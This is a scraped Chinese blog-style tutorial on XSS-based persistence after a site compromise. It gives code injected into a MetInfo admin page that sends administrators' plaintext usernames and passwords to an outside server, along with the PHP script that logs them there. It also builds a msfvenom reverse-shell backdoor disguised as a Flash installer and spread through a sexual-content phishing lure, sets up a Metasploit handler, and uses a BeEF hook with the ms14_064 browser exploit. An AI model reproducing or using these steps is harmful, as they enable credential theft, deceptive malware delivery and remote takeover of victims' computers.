您的位置: 首页 - 站长

iis 建网站手机访问注册了网站之后怎么设计

当前位置: 首页 > news >正文

iis 建网站手机访问,注册了网站之后怎么设计,网络舆情处置报告,菏泽建设局官网目录 XSS的分类 XSS跨站-后台植入Cookie表单劫持 【例1】#xff1a;利用beef或xss平台实时监控Cookie等凭据实现权限维持 【例2】#xff1a;XSS-Flash钓鱼配合MSF捆绑上线 【例3】#xff1a;XSS-浏览器网马配合MSF访问上线 XSS的分类 反射型#xff08;非持久… 目录 XSS的分类 XSS跨站-后台植入Cookie表单劫持 【例1】利用beef或xss平台实时监控Cookie等凭据实现权限维持 【例2】XSS-Flash钓鱼配合MSF捆绑上线 【例3】XSS-浏览器网马配合MSF访问上线 XSS的分类 反射型非持久型 存储型持久型 DOM型 MXSS(突变型XSS) UXSS通用型xss Flash XSS 上面这部分在上两篇文章讲过 UTF-7 XSS、MHTML XSS、CSS XSS、VBScript XSS这几个基本上是淘汰的了IE8之前才会受影响没什么价值 XSS跨站-后台植入Cookie表单劫持

  • 条件已经取得了web权限要对后台的权限进行长期控制 1. 可以借助xss盗取cookie把它写入到登录成功文件利用beef或xss平台实时监控Cookie等凭据实现权限维持这种方法即使管理员把后台账号密码改了或者把后门删除了也可以进行权限维持。因为是插入的是xss-JavaScript语句不会被后门工具识别 2. 若存在同源策略或防护情况下cookie获取失败或者密文密码解密不了可以采用表单劫持或者通过数据明文传输来实现 【例1】利用beef或xss平台实时监控Cookie等凭据实现权限维持
  1. 通过xxs平台或beef实时获取登录cookie 登录的框页面http://127.0.0.1:8105/admin/login/login.php 登录成功后会跳转到http://127.0.0.1:8105/admin/index.php?langcn 我们就可以在登录成功的admin/index.php里面管理员进行登录时就可以实时触发到xss平台或者BeEF获取到相关登录信息。 ① 将跨站代码写入admin/index.php ②成功登录网站后台 ③打开beef就可看到该主机已上线 可以观察到他加载的数据包的内容 这样只要登录成功就能获取就能进行实时控制。进行了权限维持。 但是有一些网站不采用cookie或者获取到的cookie不全但是还是不能登录。 正常来讲访问这个地址http://127.0.0.1:8105/admin/index.php?langcn 进行抓包修改 有时候xss平台获取的cookie是不全的或者说错误的。一般来说少了phpsessid (或者有防护httponly等) 那么就进行实时截取明文账号密码这样才能进行权限维持。需要一定的代码基础能读懂数据的传输流程。 2. 实时截取明文账号密码 主要解决两个问题 1.cookie失败的时候截取不到 2.取得一些权限密码解密不了 ① 观察这个网站的登录流程是怎样的 登录地址http://127.0.0.1:8105/admin/login/login.php 找到相对应的代码段D:\phpstudy_pro\WWW\xss-MetInfo5.1.4\admin\login\login.php 抓取登录的数据包 可以看到他提交的数据包账号、密码是发送给了login_check.php文件 actionloginloginlanglogin.php%3Flangset%3Dcnlogin_nameadminlogin_passadminSubmit%E7%99%BB%E5%BD%95 再次观察login_check.php 接受账号密码的变量 接受账号\(metinfo_admin_name 接受密码\)metinfo_admin_pass ② JavaScript语句将账号和密码进行发送通过get.php来实现接收 script srchttp://www.xiaodi8.com/get.php?user账号pass密码/script  在PHP中JavaScript语句通过变量\(up来接收构造payload \)upscript srchttp://47.94.236.117/web/get.php?user.\(metinfo_admin_name.pass.\)metinfo_admin_pass./script; echo \(up; ③ 在自己的服务器47.94.236.117新建get.php用于接收账号密码并写到newfile文件中 ?php \)u\(_GET[user]; \)p\(_GET[pass]; \)myfilefopen(newfile.txt,a); fwrite(\(myfile,\)u); fwrite(\(myfile,|); fwrite(\)myfile,\(p); fwrite(\)myfile,\n); fclose($myfile); ? 然后尝试登录这个网站中可以看到他尝试请求http://47.94.236.117/web/get.php这个网站把admin和password发送出 get.php接收到到的账号密码就会保存到newfile中记录这个时候就可以进行测试了。 【例2】XSS-Flash钓鱼配合MSF捆绑上线 -条件beef上线受控后或直接钓鱼受害者爱看SESE ① 生成后门攻击pc端的利用msf工具 msfvenom -p windows/meterpreter/reverse_tcp LHOST47.100.167.248 LPORT1111 -f exe flash.exe ② 模仿flash下载官方地址https://www.flash.cn/ 做出本地页面http://127.0.0.1:8081/ 构造一个相似域名的网址更逼真 ③ 把后门放在D:\phpstudy_pro\WWW\web\目录比如index.html文件 把“立即下载”链接的地址改为后门下载地址http://127.0.0.1:8081/web/flash.exe 运行后门exe并且安装正常的文件所以需要捆绑正常文件 在官方网站下载一个正常的flash文件 正常文件flashcenter_pp_ax_install_cn.exe 后门文件flash.exe 把两个文件放在一起压缩 选择高级自解压选项解压到c:\windows\tmp 点击设置解压前运行后门文件 在确定压缩为rar文件然后把文件名改成flash_install.exe再把文件的图标进行修改。 图标修改用到Restorator2018_Full_1793_FIX工具图片可以从官方的安装包中导出然后再把它替换到我们创建的exe中 启动msf监听 msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0    //绑定本地的任意网卡 set lport 1111        //设置监听本地的1111端口 run                      //开启监听 那个别人是怎么访问你这个地址呢 1.通过xss beef来让浏览器自动跳转到下载后门的地址并且运行 2.直接发给对方诱使他去访问。 通过发送消息比如小迪与某主播瑟瑟画面流出http://127.0.0.1:8081/web/诱惑.html 当访问者点击“播放按钮”提示下下载FLASH当对方安装flash时后门执行等待其上线 上线后可以获取到对方的服务器信息 执行命令getuid、shell、whoami 等 这一类遇到的问题免杀问题后门下载下来会遭到火绒等查杀 【例3】XSS-浏览器网马配合MSF访问上线 -条件beef上线受控后或直接钓鱼浏览器存在0day 配合漏洞CVE-2019-1367这个版本是IE11的漏洞但是没有公开exp。 参考文章https://www.cnblogs.com/yuzly/p/11609934.html 漏洞CVE-2020-1380https://bbs.pediy.com/thread-263885.htm 但是前面的漏洞并没有公开所以只能用到ms14_064这个漏洞参考https://blog.csdn.net/wylululu/article/details/103868759 用的是Windows7这个版本的IE在当前的网络环境中就很少他了。 1、配置MSF生成URL use exploit/windows/browser/ms14_064_ole_code_execution set allowpowershellprompt true set target 1 run 运行就会生成一个网码地址http://47.100.167.248:8080/9gwKDtliqQz 这个地址只要一访问就会被触发。但是这个地址只针对window7/window xp操作系统的IE浏览器访问 使用kali搭建的msf 只要访问这个地址就可以直接拿下服务器权限。还需要用满足的浏览器和Windows版本。 内核操作系统还有杀毒软件都会导致失败。要懂得前提条件不是只要访问就可以上线。 那么他在xss中如何实现呢 在beef中启动docker run –rm -p 3000:3000 janes/beef  登录beef47.100.167.248:3000/ui/panel 构造代码script srchttp://47.100.167.248:3000/hook.js/script 把代码放在自己网站上比如我的博客上或者本地网站上的test.html只要对方访问192.168.199.1:8081/web/test.html在beef就可以看到对方上线 在beef上利用浏览器跳转功能自动跳转访问到msf生成的访问地址 然后就可以监控到对方上线完成测试。